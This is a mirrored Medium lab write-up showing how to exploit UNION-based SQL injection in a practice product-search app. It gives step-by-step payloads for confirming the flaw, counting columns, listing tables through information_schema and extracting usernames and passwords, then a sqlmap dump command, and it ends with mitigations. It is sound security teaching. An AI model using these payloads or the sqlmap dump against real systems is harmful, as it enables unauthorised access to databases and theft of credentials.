R·D Intel

Web Security Series #8 — Exploiting UNION-Based SQL Injection (SQLi) to Extract User Credentials |… | by Laibakashif - Freedium Milestone: 20GB Reached We’ve reached 20GB of stored data — thank you for helping us grow! Patreon Ko-fi Liberapay Close < Go to the original Web Security Series #8 — Exploiting UNION-Based SQL Injection (SQLi) to Extract User Credentials |… SQL Injection remains one of the most impactful vulnerabilities in modern web applications. When input from users is directly embedded into… Laibakashif Follow ~6 min read · March 23, 2026 (Updated: March 23, 2026) · Free: Yes SQL Injection remains one of the most impactful vulnerabilities in modern web applications. When input from users is directly embedded into SQL queries without proper validation or sanitization, attackers can manipulate the database queries and retrieve sensitive data. In some cases, applications return query results directly on the page. This makes UNION-based SQL Injection particularly powerful, as attackers can merge their own queries with the original database query and display hidden information within the application response. In this write-up, I demonstrate how to identify and exploit a UNION-based SQL Injection vulnerability in a product lookup feature. The attack allows us to enumerate database tables and extract sensitive user credentials from the backend database. Finally, we automate the process using sqlmap . When to Use Test for UNION-based SQL Injection when: A search field or parameter interacts with the database (e.g., product lookup). The application returns records when valid input is provided. Injected queries are reflected in the page response. Error messages or unexpected data appear after SQL payloads. This type of testing usually occurs during the active exploitation phase after identifying a potentially vulnerable input field. Objective Confirm SQL Injection in the product search functionality. Determine the correct number of columns required for a UNION query. Enumerate database tables. Identify the injection0x03_users table. Extract usernames and passwords from the database. Automate the attack using sqlmap . Prerequisites Browser access to the vulnerable lab environment. Burp Suite (recommended for capturing requests). sqlmap installed. Basic understanding of: SQL Injection UNION SELECT information_schema database structure. Lab Steps (Detailed Walkthrough) 1 — Understanding Application Functionality The application provides a product search feature . When a valid product name is entered, the server retrieves the corresponding record from the database and displays: Product image Product name Price Description This indicates that the backend query likely retrieves four columns of data. 2 — Confirm SQL Injection First, test the behavior of the application. Entering random input such as: x returns no results. Now try a classic SQL injection payload: x' or 1=1# What happens here: The query becomes something similar to: SELECT * FROM products WHERE name = 'x' OR 1=1 Since 1=1 is always true, the database returns all products . If the page displays all products, it confirms that SQL Injection exists in the application . The page displays all products, it confirms that SQL Injection exists in the application . 3 — Determine Number of Columns for UNION SELECT To perform a UNION-based attack, we must determine how many columns the original query contains. When entering a valid product name such as: Tanjyoubi Sushi Rack the application returns exactly one product. Now we test different UNION payloads. First attempt: Tanjyoubi Sushi Rack' union select null# This returns no result. Now increase the number of columns: Tanjyoubi Sushi Rack' union select null,null# Tanjyoubi Sushi Rack' union select null,null,null# Tanjyoubi Sushi Rack' union select null,null,null,null# When using four NULL values , the query works successfully. This confirms that the original SQL query contains four columns . This works because the UNION query must match the structure of the original query. 4 — Enumerate Database Tables Now that we know the correct column count, we can start enumerating database information. Payload used: Tanjyoubi Sushi Rack' union select null,null,null,table_name from information_schema.tables# Explanation: information_schema.tables contains the names of all tables in the database. We inject the table names into the description field of the product display. This allows us to identify the table: injection0x03_users 5 — Extract Usernames Now we target the discovered table. Payload used: Tanjyoubi Sushi Rack' union select null,null,null,username from injection0x03_users# The application now displays usernames directly on the page. In this case, we retrieve the username: takeshi This confirms successful data extraction from the database. 6 — Extract Passwords Next, we retrieve the password column. Payload used: Tanjyoubi Sushi Rack' union select null,null,null,password from injection0x03_users# The password associated with the user is now displayed. At this stage, manual SQL Injection exploitation is complete . Automating the Attack Using SQLMap Manual testing is important for understanding vulnerabilities, but automation tools can significantly speed up the process. Here we use sqlmap . 7 — Prepare Request for SQLMap First, capture the request in Burp Suite . Save the POST request into a file called: request.txt Inside the request file, replace the injected payload with a normal value: From: product=Tanjyoubi+Sushi+Rack%27+union+select+null%2Cnull%2Cnull%2Cusername+from+injection0x03_users%23 To: product=test This allows sqlmap to perform its own automated injection tests. 8 — Run SQLMap Now execute: sqlmap -r request.txt -T injection0x03_users --dump Explanation: sqlmap → automated SQL injection exploitation tool -r request.txt → reads the HTTP request from the file -T injection0x03_users → targets a specific table --dump → extracts data from the table sqlmap automatically detects the vulnerability and dumps: usernames passwords All with a single command. Mitigation Strategies To prevent UNION-based SQL Injection , organizations should implement the following security practices: Use prepared statements (parameterized queries) instead of dynamic SQL queries. Validate and sanitize all user inputs before processing them in database queries. Avoid constructing SQL queries dynamically using user-controlled data. Use ORM (Object-Relational Mapping) frameworks that automatically handle query parameterization. Implement proper database access controls and follow the principle of least privilege. Limit database error messages exposed to users to prevent leakage of sensitive information. Conclusion This lab demonstrated how a UNION-based SQL Injection vulnerability can allow attackers to extract sensitive information from a database. By first confirming the injection point, determining the number of columns, and enumerating database tables, it becomes possible to retrieve critical data such as usernames and passwords. Understanding these attack techniques is essential for both security researchers and developers , as it helps identify vulnerabilities and strengthen application defenses. Connect With Me If you found this write-up helpful, feel free to follow my cybersecurity learning journey. 🔗 LinkedIn: www.linkedin.com/in/laibakashif0011 #sql-injection #web-security #cybersecurity #bug-bounty #penetration-testing Reporting a Problem Sometimes we have problems displaying some Medium posts. If you have a problem that some images aren't loading - try using VPN. Probably you have problem with access to Medium CDN (or fucking Cloudflare's bot detection algorithms are blocking you).